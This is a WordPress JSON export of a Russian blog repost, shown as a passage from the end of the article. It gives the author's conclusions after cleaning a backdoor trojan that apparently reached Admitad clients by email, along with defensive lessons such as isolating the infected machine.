\u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0445\u043e\u0437\u044f\u0438\u043d\u0443 \u043f\u0438\u0441\u044c\u043c\u043e. \u0415\u0441\u043b\u0438 \u0436\u0435 \u043f\u043e\u0434 \u0432\u0430\u0448\u0438\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0439 \u0444\u0430\u0435\u0440\u0432\u043e\u043b, \u0442\u043e \u0432 \u043d\u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u044d\u0442\u043e\u043c\u0443 \u0443\u0437\u043b\u0443 \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.<\/p>\n<h2>\u0427\u0430\u0441\u0442\u044c \u0448\u0435\u0441\u0442\u0430\u044f: \u0437\u0430\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f<\/h2>\n<p>  \u041d\u0430\u043f\u043e\u0441\u043b\u0435\u0434\u043e\u043a \u044f \u043f\u043e\u0438\u0441\u043a\u0430\u043b \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u0441\u0442\u0440\u0430\u0434\u0430\u0432\u0448\u0438\u0445 \u043e\u0442 \u044d\u0442\u043e\u0439 \u0430\u0442\u0430\u043a\u0438. \u041d\u0430\u0439\u0442\u0438 \u0438\u0445 \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0441\u043e\u0432\u0441\u0435\u043c \u043d\u0435 \u0442\u0440\u0443\u0434\u043d\u043e: \u043e\u043d\u0438 \u043e\u0431\u0441\u0443\u0436\u0434\u0430\u043b\u0438 <a href=\"http:\/\/forum.admitad.com\/index.php?\/topic\/5849-%D0%BE%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D0%BE-%D0%BF%D0%B8%D1%81%D1%8C%D0%BC%D0%B0-%D1%81-%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%B0%D0%BC%D0%B8-%D0%BE%D1%82-%D1%8F%D0%BA%D0%BE%D0%B1%D1%8B-%D0%B3%D0%BB%D0%B1%D1%83%D1%85%D0%B3%D0%B0%D0%BB%D1%82\/\">\u0442\u0435\u043c\u0443 \u043d\u0430\u043f\u0430\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u0444\u043e\u0440\u0443\u043c\u0435 Admitad<\/a>.<\/p>\n<p>  \u0422\u0430\u043a \u0447\u0442\u043e \u043a\u0430\u0440\u0442\u0438\u043d\u0430 \u0432\u044b\u0440\u0438\u0441\u043e\u0432\u044b\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f: \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u043e\u043d\u0438\u043a\u043b\u0438 \u0432 \u0441\u0435\u0442\u044c Admitad \u0438 \u0443\u0442\u044f\u043d\u0443\u043b\u0438 \u043e\u0442\u0442\u0443\u0434\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0443\u044e \u0431\u0430\u0437\u0443. \u0417\u0430\u0442\u0435\u043c \u0441\u043e\u0441\u0442\u0440\u044f\u043f\u0430\u043b\u0438 \u044d\u0442\u043e\u0433\u043e \u0442\u0440\u043e\u044f\u043d\u0430 \u0438 \u0440\u0430\u0437\u043e\u0441\u043b\u0430\u043b\u0438 \u043f\u0438\u0441\u044c\u043c\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c Admitad \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0434\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u044b\u0435 \u0438\u043c \u0443\u0437\u043b\u044b \u0431\u043e\u0442-\u0441\u0435\u0442\u0438. \u0418\u0437 \u0442\u043e\u0439 \u0436\u0435 \u0431\u043e\u0442-\u0441\u0435\u0442\u0438 \u0447\u0430\u0441\u0442\u044c \u0443\u0437\u043b\u043e\u0432, \u0438\u043c\u0435\u044e\u0449\u0438\u0445 \u043f\u0440\u044f\u043c\u043e\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u043e\u043c, \u0431\u044b\u043b\u0430 \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0435\u043d\u0430 \u0432 NoIP-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u2014 \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u043d\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0432\u043d\u043e\u0432\u044c \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u043c\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c\u0438.<\/p>\n<h4>\u041a\u0430\u043a\u0438\u0435 \u0432\u044b\u0432\u043e\u0434\u044b \u0438\u0437 \u044d\u0442\u043e\u0433\u043e \u0432\u0441\u0435\u0433\u043e \u044f \u0441\u0434\u0435\u043b\u0430\u043b \u0434\u043b\u044f \u0441\u0435\u0431\u044f?<\/h4>\n<p>  \u0412\u044b\u0432\u043e\u0434 \u043f\u0435\u0440\u0432\u044b\u0439: \u043d\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u043c \u044d\u0442\u0430\u043f\u0435 \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0442\u0440\u043e\u044f\u043d\u043e\u0432 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u00ab\u043d\u0430 \u043a\u043e\u043b\u0435\u043d\u043a\u0435\u00bb. \u0417\u0430\u0447\u0435\u043c \u043d\u0430\u043f\u0440\u044f\u0433\u0430\u0442\u044c\u0441\u044f \u0438 \u043f\u0438\u0441\u0430\u0442\u044c \u0441\u0432\u043e\u0439 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440, \u0435\u0441\u043b\u0438 \u0435\u0441\u0442\u044c \u043c\u0430\u0441\u0441\u0430 \u0433\u043e\u0442\u043e\u0432\u044b\u0445, \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0445 \u0438 \u0448\u0438\u0440\u043e\u043a\u043e\u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432? \u041d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043c\u0430\u043b\u043e\u0441\u0442\u044c \u0438\u0445 \u0434\u043e\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0438 \u0432\u0441\u0451.<\/p>\n<p>  \u0412\u044b\u0432\u043e\u0434 \u0432\u0442\u043e\u0440\u043e\u0439: \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u044b\u0441\u043e\u043a\u0430\u044f. \u0412\u0441\u0451 \u0447\u0442\u043e \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0432\u044b\u0443\u0434\u0438\u0442\u044c \u2014 email \u0445\u043e\u0437\u044f\u0438\u043d\u0430, \u0442\u043e\u043b\u043a\u0443 \u043e\u0442 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e, \u0432 \u043e\u0431\u0449\u0435\u043c-\u0442\u043e \u2014 \u043d\u043e\u043b\u044c.<\/p>\n<p>  \u0412\u044b\u0432\u043e\u0434 \u0442\u0440\u0435\u0442\u0438\u0439: \u044f \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u043b \u0433\u0440\u0443\u0431\u0435\u0439\u0448\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443. \u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u043d\u0430\u0434\u043e \u0431\u044b\u043b\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u2014 \u044d\u0442\u043e \u0432\u044b\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443, \u0430 \u043d\u0435 \u043a\u043e\u043f\u0430\u0442\u044c\u0441\u044f \u0432 \u043d\u0435\u0439, \u0442\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442. \u0417\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0439 \u0432\u0438\u043d\u0447\u0435\u0441\u0442\u0435\u0440 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043a \u0441\u0432\u043e\u0435\u043c\u0443 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f. \u041f\u043e\u0432\u0435\u0437\u043b\u043e \u0435\u0449\u0451, \u0447\u0442\u043e \u044d\u0442\u043e \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u0431\u044d\u043a\u0434\u043e\u0440, \u0430 \u043d\u0435 \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u043d\u0430\u0432\u0451\u0440\u043d\u0443\u0442\u044b\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a.<\/p>\n<p>  \u0417\u0430\u0441\u0438\u043c \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u0442\u0435 \u043e\u0442\u043a\u043b\u0430\u043d\u044f\u0442\u044c\u0441\u044f. \u0412\u0441\u0435\u043c \u0437\u0434\u043e\u0440\u043e\u0432\u044c\u044f \u0438 \u0443\u0434\u0430\u0447\u0438! \u0421\u043f\u0430\u0441\u0438\u0431\u043e \u0437\u0430 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435!               <\/p>\n<div class=\"clear\"><\/div>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habrahabr.ru\/post\/281284\/\"> https:\/\/habrahabr.ru\/post\/281284\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>       <a href=\"https:\/\/habrastorage.org\/files\/5a9\/38e\/ce1\/5a938ece14594edeb7911196fd4e9075.jpeg\"><\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/e75\/1ea\/843\/e751ea843dde44a2857fce7624d785a0.jpeg\" \/><\/div>\n<p><\/a><br \/>  \u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442!<\/p>\n<p>  \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0432\u0430\u043c \u043e\u0431 \u043e\u0434\u043d\u043e\u043c \u0442\u0440\u043e\u044f\u043d\u0441\u043a\u043e\u043c \u043a\u043e\u043d\u0435, \u0437\u0430\u0431\u0440\u0435\u0434\u0448\u0435\u043c \u0432 \u043e\u0433\u043e\u0440\u043e\u0434 \u043c\u043e\u0435\u0433\u043e \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0435\u0433\u043e \u0437\u043d\u0430\u043a\u043e\u043c\u043e\u0433\u043e, \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u044f \u0432\u044b\u0433\u043e\u043d\u044f\u043b \u043d\u0435\u0437\u0432\u0430\u043d\u043e\u0433\u043e \u0433\u043e\u0441\u0442\u044f, \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0443 \u043d\u0435\u0433\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u0438 \u043a\u0430\u043a\u0438\u0435 \u0443\u0440\u043e\u043a\u0438 \u0438\u0437 \u0432\u0441\u0435\u0433\u043e \u044d\u0442\u043e\u0433\u043e \u044f \u0432\u044b\u043d\u0435\u0441.<\/p>\n<p>  \u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u2014 \u0434\u043e\u0431\u0440\u043e \u043f\u043e\u0436\u0430\u043b\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0434 \u043a\u0430\u0442!  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-278089","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/278089","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=278089"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/278089\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=278089"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=278089"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=278089"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}